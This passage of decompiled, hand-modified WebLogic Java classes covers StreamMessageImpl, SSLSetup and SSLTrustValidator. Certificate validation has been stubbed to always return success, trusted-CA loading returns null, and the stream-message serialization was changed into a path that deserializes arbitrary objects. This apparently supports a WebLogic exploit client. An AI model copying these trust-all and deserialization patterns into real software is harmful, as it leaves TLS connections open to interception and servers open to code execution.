this.length = this.bdos.size();
this.bdos = null;
}
this.copyOnWrite = false;
}
public MessageImpl copy() throws JMSException {
StreamMessageImpl var1 = new StreamMessageImpl();
super.copy(var1);
if (this.bdos != null) {
var1.buffer = this.bdos.getBuffer();
var1.length = this.bdos.size();
this.copyOnWrite = true;
} else {
var1.buffer = this.buffer;
var1.length = this.length;
}
var1.setBodyWritable(false);
var1.setPropertiesWritable(false);
return var1;
}
private void checkWritable() throws JMSException {
super.writeMode();
if (this.bdos == null) {
this.bdos = new BufferDataOutputStream((ObjectIOBypass) null, 256);
} else if (this.copyOnWrite) {
this.bdos.copyBuffer();
this.copyOnWrite = false;
}
}
private void checkReadable() throws JMSException {
super.readMode();
if (this.buffer != null && this.length != 0) {
if (this.bdis == null) {
this.bdis = new BufferDataInputStream((ObjectIOBypass) null, this.buffer, 0, this.length);
}
} else {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd());
}
}
public String toString() {
return "StreamMessage[" + this.getJMSMessageID() + "]";
}
public void writeExternal(ObjectOutput paramObjectOutput) throws IOException {
super.writeExternal(paramObjectOutput);
paramObjectOutput.writeByte(1);
paramObjectOutput.writeInt(getDataSize());
paramObjectOutput.write(getDataBuffer());
// super.writeExternal(var1);
// int var3 = 2147483647;
// ObjectOutput var2;
// if(var1 instanceof JMSObjectOutputWrapper) {
// var3 = ((JMSObjectOutputWrapper)var1).getCompressionThreshold();
// var2 = ((JMSObjectOutputWrapper)var1).getInnerObjectOutput();
// } else {
// var2 = var1;
// }
//
// byte var4;
// if(this.getVersion(var2) >= 30) {
// var4 = (byte)(3 | (this.shouldCompress(var2, var3)?-128:0));
// } else {
// var4 = 2;
// }
//
// var2.writeByte(var4);
// byte[] var5;
// int var6;
// if(this.bdos != null) {
// var5 = this.bdos.getBuffer();
// var6 = this.bdos.size();
// } else {
// var5 = this.buffer;
// var6 = this.length;
// }
//
// if(this.isCompressed()) {
// if(var4 == 2) {
// byte[] var7 = this.decompress();
// var2.writeInt(var7.length);
// var2.write(var7, 0, var7.length);
// } else {
// this.flushCompressedMessageBody(var2);
// }
// } else if((var4 & -128) != 0) {
// this.compressByteArray(var2, var5, var6);
// } else if(var5 != null && var6 != 0) {
// var2.writeInt(var6);
// var2.write(var5, 0, var6);
// } else {
// var2.writeInt(0);
// }
}
public final void decompressMessageBody() throws JMSException {
if (this.isCompressed()) {
try {
this.buffer = this.decompress();
this.length = this.buffer.length;
} catch (IOException var6) {
throw new weblogic.jms.common.JMSException(JMSClientExceptionLogger.logErrorDecompressMessageBodyLoggable().getMessage(), var6);
} finally {
this.cleanupCompressedMessageBody();
}
}
}
public void readExternal(ObjectInput var1) throws IOException, ClassNotFoundException {
super.readExternal(var1);
byte var2 = var1.readByte();
byte var3 = (byte) (var2 & 127);
if (var3 >= 1 && var3 <= 3) {
switch (var3) {
case 1:
this.length = var1.readInt();
this.buffer = new byte[this.length];
var1.readFully(this.buffer);
ByteArrayInputStream var4 = new ByteArrayInputStream(this.buffer);
ObjectInputStream var5 = new ObjectInputStream(var4);
this.setBodyWritable(true);
this.setPropertiesWritable(true);
try {
while (true) {
this.writeObject(var5.readObject());
}
} catch (EOFException var9) {
try {
this.reset();
this.setPropertiesWritable(false);
byte[] var7 = new byte[this.length];
System.arraycopy(this.buffer, 0, var7, 0, this.length);
this.buffer = var7;
} catch (JMSException var8) {
JMSClientExceptionLogger.logStackTrace(var8);
}
} catch (MessageNotWriteableException var10) {
JMSClientExceptionLogger.logStackTrace(var10);
} catch (javax.jms.MessageFormatException var11) {
JMSClientExceptionLogger.logStackTrace(var11);
} catch (JMSException var12) {
JMSClientExceptionLogger.logStackTrace(var12);
}
break;
case 3:
if ((var2 & -128) != 0) {
this.saveCompressedMessageBody(var1);
break;
}
case 2:
if ((this.length = var1.readInt()) > 0) {
this.buffer = new byte[this.length];
var1.readFully(this.buffer);
}
}
} else {
throw JMSUtilities.versionIOException(var3, 1, 3);
}
}
public long getPayloadSize() {
return this.isCompressed() ? (long) this.getCompressedMessageBodySize() : (super.bodySize != -1L ? super.bodySize : (this.buffer != null ? (super.bodySize = (long) this.length) : (this.bdos != null ? (long) this.bdos.size() : (super.bodySize = 0L))));
}
private String typeCodeToString(int var1) {
try {
return TYPE_CODE_STRINGS[var1];
} catch (Throwable var3) {
return TYPE_CODE_STRINGS[0];
}
}
private void writeStringInternal(String var1) throws IOException, JMSException {
if (var1.length() > 20000) {
this.writeType((byte) 10);
this.bdos.writeUTF32(var1);
} else {
this.writeType((byte) 9);
this.bdos.writeUTF(var1);
}
}
private String readStringInternal(byte var1) throws IOException {
return var1 == 10 ? this.bdis.readUTF32() : this.bdis.readUTF();
}
public final byte[] getDataBuffer() {
return this.bdos != null ? this.bdos.getBuffer() : this.buffer;
}
public final int getDataSize() {
return this.bdos != null ? this.bdos.size() : this.length;
}
public final void setDataBuffer(byte[] var1, int var2) {
this.buffer = var1;
this.length = var2;
}
public byte[] getMessageBody(int[] var1) throws JMSException {
if (!this.isCompressed()) {
var1[0] = this.getDataSize();
return this.getDataBuffer();
} else {
try {
byte[] var2 = this.decompress();
var1[0] = var2.length;
return var2;
} catch (IOException var3) {
throw new weblogic.jms.common.JMSException(JMSClientExceptionLogger.logErrorDecompressMessageBodyLoggable().getMessage(), var3);
}
}
}
}
================================================
FILE: src/weblogic/security/utils/SSLSetup.java
================================================
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
package weblogic.security.utils;
import java.io.FileInputStream;
import java.io.InputStream;
import java.net.InetAddress;
import java.net.SocketException;
import java.security.AccessController;
import java.security.KeyManagementException;
import java.security.KeyStore;
import java.security.PrivateKey;
import java.security.cert.CertificateException;
import java.security.cert.CertificateFactory;
import java.security.cert.X509Certificate;
import java.util.ArrayList;
import java.util.Properties;
import javax.net.ssl.SSLSession;
import javax.net.ssl.SSLSocket;
import weblogic.kernel.Kernel;
import weblogic.logging.Loggable;
import weblogic.management.configuration.ServerMBean;
import weblogic.management.provider.CommandLine;
import weblogic.management.provider.ManagementService;
import weblogic.security.SecurityLogger;
import weblogic.security.SSL.HostnameVerifier;
import weblogic.security.SSL.SSLClientInfo;
import weblogic.security.SSL.TrustManager;
import weblogic.security.acl.internal.AuthenticatedSubject;
import weblogic.security.service.PrivilegedActions;
import weblogic.security.service.SecurityServiceManager;
public final class SSLSetup extends SSLSetupLogging {
public static final int STANDARD_IO = 0;
public static final int MUXING_IO = 1;
public static final int LICENSE_NOT_CHECKED = -1;
public static final int LICENSE_NONE = 0;
public static final int LICENSE_DOMESTIC = 1;
public static final int LICENSE_EXPORT = 2;
private static final AuthenticatedSubject kernelId = (AuthenticatedSubject)AccessController.doPrivileged(PrivilegedActions.getKernelIdentityAction());
public static final String FAILURE_DETAILS = "weblogic.security.ssl.failureDetails";
private static boolean ioModelAccessed = false;
private static int ioModel = 0;
private static int licenseLevel = -1;
private static int debugLevel = 0;
private static boolean protocolVersionChecked = false;
private static int protocolVersion = 3;
private static boolean enforceConstraintsChecked = false;
private static int enforceConstraints = 1;
private static final String CERTICOM_DELEGATE = "com.bea.sslplus.CerticomSSLContext";
private static final String RSA_DELEGATE = "com.rsa.ssl.WeblogicContextWrapper";
private static Class sslDelegateClass = null;
public SSLSetup() {
}
public static synchronized int getLicenseLevel() {
if(licenseLevel > -1) {
return licenseLevel;
} else {
licenseLevel = 1;
String var0 = "com.bea.sslplus.CerticomSSLContext";
info("Use Certicom SSL with Domestic strength");
setSSLDelegate(var0);
return licenseLevel;
}
}
public static synchronized void initForServer() {
setIOModel(1);
info("Enabled muxing IO for SSL in server");
}
private static void setSSLDelegate(String var0) {
try {
sslDelegateClass = Class.forName(var0);
if(!SSLContextDelegate.class.isAssignableFrom(sslDelegateClass)) {
String var1 = "Cannot initialize SSL implementation. " + var0 + " does not implement " + SSLContextDelegate.class.getName();
throw new IllegalArgumentException(var1);
}
} catch (ClassNotFoundException var3) {
String var2 = SecurityLogger.getClassNotFound(var0);
throw new IllegalArgumentException(var2, var3);
}
}
static SSLContextDelegate getSSLDelegateInstance() {
if(licenseLevel == -1) {
getLicenseLevel();
}
String var1;
// return new SSLContextDelegateImpl();
try {
return (SSLContextDelegate)sslDelegateClass.newInstance();
} catch (IllegalAccessException var2) {
var1 = SecurityLogger.getIllegalAccessOnContextWrapper(sslDelegateClass.getName());
throw new RuntimeException(var1, var2);
} catch (InstantiationException var3) {
var1 = SecurityLogger.getInstantiationExcOnContextWrapper(sslDelegateClass.getName());
throw new RuntimeException(var1, var3);
}
}
public static int getIOModel() {
ioModelAccessed = true;
return ioModel;
}
public static boolean logSSLRejections() {
if(Kernel.isApplet()) {
return false;
} else if(!Kernel.isServer()) {
return true;
} else {
try {
return ManagementService.getRuntimeAccess(kernelId).getServer().getSSL().isSSLRejectionLoggingEnabled();
} catch (Exception var1) {
info(var1, "Caught exception in SSLSetup.logSSLRejections");
return false;
}
}
}
public static void setIOModel(int var0) {
if(var0 != 0 && var0 != 1) {
debug(2, "Attempt to change SSL IO model to invalid setting");
} else if(ioModelAccessed) {
debug(2, "Attempt to change SSL IO model after access");
} else {
ioModel = var0;
}
}
public static int getProtocolVersion() {
if(!protocolVersionChecked) {
try {
String var0 = CommandLine.getCommandLine().getSSLVersion();
if(var0 != null) {
if(var0.equalsIgnoreCase("SSL3")) {
protocolVersion = 1;
} else if(var0.equalsIgnoreCase("TLS1")) {
protocolVersion = 0;
} else if(var0.equalsIgnoreCase("ALL")) {
protocolVersion = 3;
}
}
} catch (SecurityException var1) {
;
}
protocolVersionChecked = true;
}
return protocolVersion;
}
public static int getEnforceConstraints() {
if(!enforceConstraintsChecked) {
try {
String var0 = CommandLine.getCommandLine().getSSLEnforcementConstraint();
if(var0 != null) {
if(!var0.equalsIgnoreCase("off") && !var0.equalsIgnoreCase("false")) {
if(!var0.equalsIgnoreCase("strong") && !var0.equalsIgnoreCase("true")) {
if(var0.equalsIgnoreCase("strict")) {
enforceConstraints = 2;
}
} else {
enforceConstraints = 1;
}
} else {
enforceConstraints = 0;
}
}
} catch (SecurityException var1) {
;
}
enforceConstraintsChecked = true;
}
return enforceConstraints;
}
public static SSLContextWrapper getSSLContext() throws SocketException {
return getSSLContext((SSLClientInfo)null);
}
public static SSLContextWrapper getSSLContext(SSLClientInfo var0) throws SocketException {
SSLContextWrapper var1 = SSLContextWrapper.getInstance();
if(!Kernel.isApplet()) {
X509Certificate[] var2 = getTrustedCAs(var1);
if(var2 != null) {
try {
var1.addTrustedCA(var2);
} catch (Exception var4) {
debug(2, var4, "Failure loading trusted CA list");
}
}
}
// if(var0 != null) {
// applyInfo(var1, var0);
// }
return var1;
}
private static void applyInfo(SSLContextWrapper var0, SSLClientInfo var1) throws SocketException {
// InputStream[] var2 = var1.getSSLClientCertificate();
// if(var2 != null && var2.length >= 2) {
// info("clientInfo has old style certificate and key");
//
// try {
// String var3 = var1.getSSLClientKeyPassword();
// char[] var4 = null;
// if(var3 != null) {
// var4 = var3.toCharArray();
// }
//
// PrivateKey var5 = var0.inputPrivateKey(var2[0], var4);
// X509Certificate[] var6 = new X509Certificate[var2.length - 1];
// CertificateFactory var7 = CertificateFactory.getInstance("X.509");
//
// for(int var8 = 1; var8 < var2.length; ++var8) {
// var6[var8 - 1] = (X509Certificate)var7.generateCertificate(var2[var8]);
// }
//
// var0.addIdentity(var6, var5);
// info("client identity added");
// } catch (KeyManagementException var9) {
// info(var9, "Problem accessing private key");
// throw new SocketException(SecurityLogger.getProblemAccessingPrivateKey());
// } catch (CertificateException var10) {
// info(var10, "Problem with certificate chain");
// throw new SocketException(SecurityLogger.getProblemWithCertificateChain(var10.getMessage()));
// }
// }
//
// X509Certificate[] var11 = (X509Certificate[])var1.getClientLocalIdentityCert();
// PrivateKey var12 = var1.getClientLocalIdentityKey();
// if(var11 != null && var12 != null) {
// info("clientInfo has new style certificate and key");
// var0.addIdentity(var11, var12);
// }
//
// TrustManager var13 = var1.getTrustManager();
// if(var13 != null) {
// info("clientInfo has programmatic TrustManager");
// var0.getTrustManager().setTrustManager(var13);
// }
//
// byte[][] var14 = var1.getRootCAfingerprints();
// if(var14 != null) {
// info("Adding legacy rootCA fingerprints");
// var0.getTrustManager().setRootCAFingerPrints(var14);
// }
//
// HostnameVerifier var15 = var1.getHostnameVerifier();
// if(var15 != null) {
// info("clientInfo has HostnameVerifier");
// var0.getHostnameVerifier().setHostnameVerifier(var15);
// }
//
// String var16 = var1.getExpectedName();
// if(var16 != null) {
// info("clientInfo has expectedName");
// var0.getHostnameVerifier().setExpectedName(var16);
// }
}
private static X509Certificate[] getTrustedCAs(SSLContextWrapper var0) {
// X509Certificate[] var1 = null;
// String var2;
// KeyStoreInfo[] var3;
// if(!Kernel.isServer()) {
// var2 = CommandLine.getCommandLine().getSSLTrustCA();
// var3 = var2 != null?new KeyStoreInfo[]{new KeyStoreInfo(var2, "jks", (String)null)}:(new KeyStoreConfigurationHelper(ClientKeyStoreConfiguration.getInstance())).getTrustKeyStores();
// ArrayList var4 = new ArrayList();
//
// for(int var5 = 0; var3 != null && var5 < var3.length; ++var5) {
// info("Trusted CA keystore: " + var3[var5].getFileName());
//
// try {
// KeyStore var6 = KeyStore.getInstance(var3[var5].getType());
// FileInputStream var7 = new FileInputStream(var3[var5].getFileName());
// var6.load(var7, (char[])null);
// var4.addAll(SSLCertUtility.getX509Certificates(var6));
// var7.close();
// } catch (Exception var9) {
// debug(2, var9, "Failure loading trusted CA list from: " + var3[var5].getFileName());
// }
// }
//
// var1 = (X509Certificate[])((X509Certificate[])var4.toArray(new X509Certificate[var4.size()]));
// } else {
// info("SSLSetup: loading trusted CA certificates");
// if(SecurityServiceManager.isSecurityServiceInitialized()) {
// try {
// var1 = SSLContextManager.getServerTrustedCAs();
// } catch (Exception var8) {
// debug("Failed to load server trusted CAs", var8);
// }
// } else {
// debug(2, "SSLSetup: using pre-mbean command line configuration for SSL trust");
// var2 = CommandLine.getCommandLine().getSSLTrustCA();
// var3 = var2 != null?new KeyStoreInfo[]{new KeyStoreInfo(var2, "jks", (String)null)}:(new KeyStoreConfigurationHelper(PreMBeanKeyStoreConfiguration.getInstance())).getTrustKeyStores();
// var1 = SSLContextManager.getTrustedCAs(var3);
// }
// }
//
// return var1 != null && var1.length != 0?var1:null;
return null;
}
public static void setFailureDetails(SSLSession var0, String var1) {
var0.putValue("weblogic.security.ssl.failureDetails", var1);
}
public static String getFailureDetails(SSLSession var0) {
return (String)var0.getValue("weblogic.security.ssl.failureDetails");
}
public static void logPlaintextProtocolClientError(SSLSocket var0, String var1) {
String var2 = getPeerName(var0);
debug(2, "Connection to SSL port was made from " + var2 + " using plaintext protocol: " + var1);
if(logSSLRejections()) {
Loggable var3 = SecurityLogger.logPlaintextProtocolClientErrorLoggable(var1, var2);
var3.log();
setFailureDetails(var0.getSession(), var3.getMessage());
}
}
public static void logProtocolVersionError(SSLSocket var0) {
String var1 = getPeerName(var0);
debug(2, "Connection to SSL port from " + var1 + " appears to be either unknown SSL version or maybe is plaintext");
if(logSSLRejections()) {
Loggable var2 = SecurityLogger.logProtocolVersionErrorLoggable(var1);
var2.log();
setFailureDetails(var0.getSession(), var2.getMessage());
}
}
public static void logCertificateChainConstraintsStrictNonCriticalFailure(SSLSocket var0) {
String var1 = getPeerName(var0);
debug(2, "The certificate chain received from " + var1 + " contained a V3 CA certificate which had basic constraints which were not marked critical, " + "this is being rejected due to the strict enforcement of basic constraints.");
if(logSSLRejections()) {
Loggable var2 = SecurityLogger.logCertificateChainConstraintsStrictNonCriticalFailureLoggable(var1);
var2.log();
setFailureDetails(var0.getSession(), var2.getMessage());
}
}
public static void logCertificateChainMissingConstraintsFailure(SSLSocket var0) {
String var1 = getPeerName(var0);
debug(2, "The certificate chain received from " + var1 + " contained a V3 CA certificate which was missing the basic constraints extension");
if(logSSLRejections()) {
Loggable var2 = SecurityLogger.logCertificateChainMissingConstraintsFailureLoggable(var1);
var2.log();
setFailureDetails(var0.getSession(), var2.getMessage());
}
}
public static void logCertificateChainNotACaConstraintsFailure(SSLSocket var0) {
String var1 = getPeerName(var0);
debug(2, "The certificate chain received from " + var1 + " contained a V3 CA certificate which didn't indicate it really is a CA");
if(logSSLRejections()) {
Loggable var2 = SecurityLogger.logCertificateChainNotACaConstraintsFailureLoggable(var1);
var2.log();
setFailureDetails(var0.getSession(), var2.getMessage());
}
}
public static void logCertificateChainPathLenExceededConstraintsFailure(SSLSocket var0) {
String var1 = getPeerName(var0);
debug(2, "The certificate chain received from " + var1 + " contained a V3 CA certificate which indicated a certificate chain path length in the basic constraints that was exceeded");
if(logSSLRejections()) {
Loggable var2 = SecurityLogger.logCertificateChainPathLenExceededConstraintsFailureLoggable(var1);
var2.log();
setFailureDetails(var0.getSession(), var2.getMessage());
}
}
public static void logCertificateChainConstraintsConversionFailure(SSLSocket var0) {
String var1 = getPeerName(var0);
debug(2, "The certificate chain received from " + var1 + " contained a V3 CA certificate which couldn't be converted to be checked for basic constraints.");
if(logSSLRejections()) {
Loggable var2 = SecurityLogger.logCertificateChainConstraintsConversionFailureLoggable(var1);
var2.log();
setFailureDetails(var0.getSession(), var2.getMessage());
}
}
public static void logCertificateChainUnrecognizedExtensionFailure(SSLSocket var0, String var1) {
String var2 = getPeerName(var0);
debug(2, "The certificate chain received from " + var2 + " contained a V3 certificate with unrecognized critical extension: " + var1);
if(logSSLRejections()) {
Loggable var3 = SecurityLogger.logCertificateChainUnrecognizedExtensionFailureLoggable(var2, var1);
var3.log();
setFailureDetails(var0.getSession(), var3.getMessage());
}
}
public static void logCertificateChainAlgKeyUsageFailure(SSLSocket var0) {
String var1 = getPeerName(var0);
debug(2, "The certificate chain received from " + var1 + " contained a V3 certificate which key usage constraints indicate" + " its key cannot be used in quality required by the key agreement algorithm");
if(logSSLRejections()) {
Loggable var2 = SecurityLogger.logCertificateChainAlgKeyUsageFailureLoggable(var1);
var2.log();
setFailureDetails(var0.getSession(), var2.getMessage());
}
}
public static void logCertificateChainCheckKeyUsageFailure(SSLSocket var0) {
String var1 = getPeerName(var0);
debug(2, "Cannot check key usage constraints of certificate recieved from " + var1 + " because of the failure to determine the key agreement algorithm");
if(logSSLRejections()) {
Loggable var2 = SecurityLogger.logCertificateChainCheckKeyUsageFailureLoggable(var1);
var2.log();
setFailureDetails(var0.getSession(), var2.getMessage());
}
}
public static void logCertificateChainCertSignKeyUsageFailure(SSLSocket var0) {
String var1 = getPeerName(var0);
debug(2, "The certificate chain received from " + var1 + " contained a V3 CA certificate which key usage constraints indicate" + " its key cannot be used to sign certificates");
if(logSSLRejections()) {
Loggable var2 = SecurityLogger.logCertificateChainCertSignKeyUsageFailureLoggable(var1);
var2.log();
setFailureDetails(var0.getSession(), var2.getMessage());
}
}
public static void logCertificatePolicyIdDoesntExistIntheList(SSLSocket var0, String var1) {
String var2 = getPeerName(var0);
debug(2, "Certificate Policies Extension Processing Failed,PolicyId: " + var1 + " doesn't Exist in the allowed list");
if(logSSLRejections()) {
Loggable var3 = SecurityLogger.logCertificatePolicyIdDoesntExistIntheListLoggable(var1);
var3.log();
setFailureDetails(var0.getSession(), var3.getMessage());
}
}
public static void logPolicyQualifierIdNotCPS(SSLSocket var0, String var1) {
String var2 = getPeerName(var0);
debug(2, "PolicyQualifier Id Found in the Certificate" + var1 + " doesn't match with CPS Qualifier Id");
if(logSSLRejections()) {
Loggable var3 = SecurityLogger.logPolicyQualifierIdNotCPSLoggable(var1);
var3.log();
setFailureDetails(var0.getSession(), var3.getMessage());
}
}
public static String getPeerName(SSLSocket var0) {
String var1 = "unknown";
if(var0 != null) {
InetAddress var2 = var0.getInetAddress();
if(var2 != null) {
try {
var1 = var2.getHostName() + " - " + var2.getHostAddress();
} catch (SecurityException var4) {
var1 = var2.getHostAddress();
}
if(var1 == null) {
var1 = var2.toString();
}
}
}
return var1;
}
public static void logAlertReceivedFromPeer(SSLSocket var0, int var1) {
if(logSSLRejections() && var1 != 0 && var1 != 90) {
String var2 = getPeerName(var0);
Loggable var3 = null;
switch(var1) {
case 10:
var3 = SecurityLogger.logUnexpectedMessageAlertReceivedFromPeerLoggable(var2);
break;
case 11:
case 12:
case 13:
case 14:
case 15:
case 16:
case 17:
case 18:
case 19:
case 23:
case 24:
case 25:
case 26:
case 27:
case 28:
case 29:
case 31:
case 32:
case 33:
case 34:
case 35:
case 36:
case 37:
case 38:
case 39:
case 52:
case 53:
case 54:
case 55:
case 56:
case 57:
case 58:
case 59:
case 61:
case 62:
case 63:
case 64:
case 65:
case 66:
case 67:
case 68:
case 69:
case 72:
case 73:
case 74:
case 75:
case 76:
case 77:
case 78:
case 79:
case 81:
case 82:
case 83:
case 84:
case 85:
case 86:
case 87:
case 88:
case 89:
case 90:
case 91:
case 92:
case 93:
case 94:
case 95:
case 96:
case 97:
case 98:
case 99:
default:
var3 = SecurityLogger.logAlertReceivedFromPeerLoggable(var2, Integer.toString(var1));
break;
case 20:
var3 = SecurityLogger.logBadRecordMacAlertReceivedFromPeerLoggable(var2);
break;
case 21:
var3 = SecurityLogger.logDecryptionFailedAlertReceivedFromPeerLoggable(var2);
break;
case 22:
var3 = SecurityLogger.logRecordOverFlowAlertReceivedFromPeerLoggable(var2);
break;
case 30:
var3 = SecurityLogger.logDecompressionFailureAlertReceivedFromPeerLoggable(var2);
break;
case 40:
var3 = SecurityLogger.logHandshakeFailureAlertReceivedFromPeerLoggable(var2);
break;
case 41:
var3 = SecurityLogger.logNoCertificateAlertReceivedFromPeerLoggable(var2);
break;
case 42:
var3 = SecurityLogger.logBadCertificateAlertReceivedFromPeerLoggable(var2);
break;
case 43:
var3 = SecurityLogger.logUnsupportedCertificateAlertReceivedFromPeerLoggable(var2);
break;
case 44:
var3 = SecurityLogger.logCertificateRevokedAlertReceivedFromPeerLoggable(var2);
break;
case 45:
var3 = SecurityLogger.logCertificateExpiredAlertReceivedFromPeerLoggable(var2);
break;
case 46:
var3 = SecurityLogger.logCertificateUnknownAlertReceivedFromPeerLoggable(var2);
break;
case 47:
var3 = SecurityLogger.logIllegalParameterAlertReceivedFromPeerLoggable(var2);
break;
case 48:
var3 = SecurityLogger.logUnknownCAAlertReceivedFromPeerLoggable(var2);
break;
case 49:
var3 = SecurityLogger.logAccessDeniedAlertReceivedFromPeerLoggable(var2);
break;
case 50:
var3 = SecurityLogger.logDecodeErrorAlertReceivedFromPeerLoggable(var2);
break;
case 51:
var3 = SecurityLogger.logDecryptErrorAlertReceivedFromPeerLoggable(var2);
break;
case 60:
var3 = SecurityLogger.logExportRestrictionAlertReceivedFromPeerLoggable(var2);
break;
case 70:
var3 = SecurityLogger.logProtocolVersionAlertReceivedFromPeerLoggable(var2);
break;
case 71:
var3 = SecurityLogger.logInsufficientSecurityAlertReceivedFromPeerLoggable(var2);
break;
case 80:
var3 = SecurityLogger.logInternalErrorAlertReceivedFromPeerLoggable(var2);
break;
case 100:
var3 = SecurityLogger.logNoRenegotiationAlertReceivedFromPeerLoggable(var2);
}
var3.log();
setFailureDetails(var0.getSession(), var3.getMessage());
}
}
public static Properties getSSLTrustProperties(ServerMBean var0) {
Properties var1 = new Properties();
String var2 = var0.getKeyStores();
if("DemoIdentityAndDemoTrust".equals(var2)) {
add(var1, "TrustKeyStore", "DemoTrust");
add(var1, "JavaStandardTrustKeyStorePassPhrase", var0.getJavaStandardTrustKeyStorePassPhrase());
} else if("CustomIdentityAndJavaStandardTrust".equals(var2)) {
add(var1, "TrustKeyStore", "JavaStandardTrust");
add(var1, "JavaStandardTrustKeyStorePassPhrase", var0.getJavaStandardTrustKeyStorePassPhrase());
} else if("CustomIdentityAndCustomTrust".equals(var2)) {
add(var1, "TrustKeyStore", "CustomTrust");
add(var1, "CustomTrustKeyStoreFileName", var0.getCustomTrustKeyStoreFileName());
add(var1, "CustomTrustKeyStoreType", var0.getCustomTrustKeyStoreType());
add(var1, "CustomTrustKeyStorePassPhrase", var0.getCustomTrustKeyStorePassPhrase());
} else if(!"CustomIdentityAndCommandLineTrust".equals(var2)) {
throw new RuntimeException(SecurityLogger.getAssertionIllegalKeystoresValue(var2));
}
return var1;
}
static boolean isFatClient() {
return !Kernel.isServer();
}
public static void logSSLUsingNullCipher() {
SecurityLogger.logSSLUsingNullCipher();
}
private static void add(Properties var0, String var1, String var2) {
if(var2 != null) {
var0.setProperty(var1, var2);
}
}
}
================================================
FILE: src/weblogic/security/utils/SSLTrustValidator.java
================================================
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
package weblogic.security.utils;
import weblogic.kernel.Kernel;
import weblogic.logging.Loggable;
import weblogic.security.SSL.CertPathTrustManager;
import weblogic.security.SSL.TrustManager;
import weblogic.security.SecurityLogger;
import javax.net.ssl.SSLSocket;
import java.net.InetAddress;
import java.security.cert.X509Certificate;
public class SSLTrustValidator implements SSLTruster {
private boolean peerCertsRequired = false;
private boolean overrideAllowed = true;
private TrustManager trustManager = null;
private byte[][] rootCAFingerPrints = (byte[][]) null;
private String proxyHostName = null;
private String urlHostName = null;
public SSLTrustValidator() {
if (Kernel.isServer()) {
this.setTrustManager(new CertPathTrustManager());
}
}
public void setTrustManager(TrustManager var1) {
this.trustManager = var1;
}
public void setRootCAFingerPrints(byte[][] var1) {
this.rootCAFingerPrints = var1;
}
public boolean isPeerCertsRequired() {
return this.peerCertsRequired;
}
public void setPeerCertsRequired(boolean var1) {
this.peerCertsRequired = var1;
}
public void setAllowOverride(boolean var1) {
this.overrideAllowed = var1;
}
public void setProxyMapping(String var1, String var2) {
this.urlHostName = var2;
this.proxyHostName = var1;
}
public int validationCallback(X509Certificate[] var1, int var2, SSLSocket var3, X509Certificate[] var4) {
// boolean var5 = SSLSetup.isDebugEnabled();
// int var6 = var2;
// if(var5) {
// SSLSetup.info("validationCallback: validateErr = " + var2);
// if(var1 != null) {
// for(int var7 = 0; var7 < var1.length; ++var7) {
// SSLSetup.info(" cert[" + var7 + "] = " + var1[var7]);
// }
// }
// }
//
// if((var2 & 16) != 0 && this.rootCAFingerPrints != null && var1 != null && var1.length > 0) {
// try {
// byte[] var15 = SSLCertUtility.getFingerprint(var1[var1.length - 1]);
//
// for(int var8 = 0; var8 < this.rootCAFingerPrints.length; ++var8) {
// if(Arrays.equals(var15, this.rootCAFingerPrints[var8])) {
// var6 &= -21;
// if(var5) {
// SSLSetup.info("Untrusted cert now trusted by legacy check");
// }
// break;
// }
// }
// } catch (CertificateEncodingException var14) {
// SSLSetup.debug(1, var14, "Error while getting encoded certificate during trust validation");
// }
// }
//
// if(var1 == null || var1.length == 0) {
// if(this.peerCertsRequired) {
// if(var5) {
// SSLSetup.info("Required peer certificates not supplied by peer");
// }
//
// var6 |= 4;
// } else {
// if(var5) {
// SSLSetup.info("Peer certificates are not required and were not supplied by peer");
// }
//
// var6 = 0;
// }
// }
//
// if(this.trustManager != null) {
// TrustManagerEnvironment.push(var4, var3);
// boolean var16 = false;
//
// try {
// var16 = this.trustManager.certificateCallback(var1, var6);
// } finally {
// TrustManagerEnvironment.pop();
// }
//
// if(!var16 && var6 == 0) {
// var6 |= 32;
// }
//
// if(var5) {
// SSLSetup.info("weblogic user specified trustmanager validation status " + var6);
// }
// }
//
// if(var6 != 0) {
// this.logValidationError(var6, var3);
// if(!this.overrideAllowed) {
// if(var5) {
// SSLSetup.info("User defined JSSE trustmanagers not allowed to override");
// }
//
// var6 |= 64;
// }
// }
//
// if(var5) {
// SSLSetup.info("SSLTrustValidator returns: " + var6);
// }
return 0;
}
private String getTrustManagerClassName() {
return this.trustManager != null ? this.trustManager.getClass().getName() : null;
}
private String getPeerName(SSLSocket var1) {
String var2 = SSLSetup.getPeerName(var1);
if (this.proxyHostName != null && this.urlHostName != null) {
InetAddress var3 = var1.getInetAddress();
if (var3 != null && (this.proxyHostName.equals(var3.getHostName()) || this.proxyHostName.equals(var3.getHostAddress()))) {
var2 = var2 + " --> " + this.urlHostName;
}
}
return var2;
}
private void logValidationError(int var1, SSLSocket var2) {
if (SSLSetup.logSSLRejections()) {
String var3 = this.getPeerName(var2);
Loggable[] var4 = new Loggable[5];
int var5 = 0;
if ((var1 & 1) != 0) {
var4[var5++] = SecurityLogger.logHandshakeCertInvalidErrorLoggable(var3);
}
if ((var1 & 2) != 0) {
var4[var5++] = SecurityLogger.logHandshakeCertExpiredErrorLoggable(var3);
}
if ((var1 & 4) != 0) {
var4[var5++] = SSLSetup.isFatClient() ? SecurityLogger.logFatClientHandshakeCertIncompleteErrorLoggable(var3) : SecurityLogger.logHandshakeCertIncompleteErrorLoggable(var3);
}
if ((var1 & 16) != 0) {
var4[var5++] = SSLSetup.isFatClient() ? SecurityLogger.logFatClientHandshakeCertUntrustedErrorLoggable(var3) : SecurityLogger.logHandshakeCertUntrustedErrorLoggable(var3);
}
if ((var1 & 32) != 0) {
var4[var5++] = SSLSetup.isFatClient() ? SecurityLogger.logFatClientHandshakeCertValidationErrorLoggable(var3, this.getTrustManagerClassName()) : SecurityLogger.logHandshakeCertValidationErrorLoggable(var3, this.getTrustManagerClassName());
}
if (var5 > 0) {
StringBuffer var6 = null;
if (var2 != null) {
var6 = new StringBuffer();
}
for (int var7 = 0; var7 < var5; ++var7) {
var4[var7].log();
if (var2 != null) {
if (var7 > 0) {
var6.append(", ");
}
var6.append(var4[var7].getMessage());
}
}
if (var2 != null) {
SSLSetup.setFailureDetails(var2.getSession(), var6.toString());
}
}
}
if (SSLSetup.isDebugEnabled()) {
SSLSetup.info("Validation error = " + var1);
if ((var1 & 1) != 0) {
SSLSetup.info("Certificate chain is invalid");
}
if ((var1 & 2) != 0) {
SSLSetup.info("Expired certificate");
}
if ((var1 & 4) != 0) {
SSLSetup.info("Certificate chain is incomplete");
}
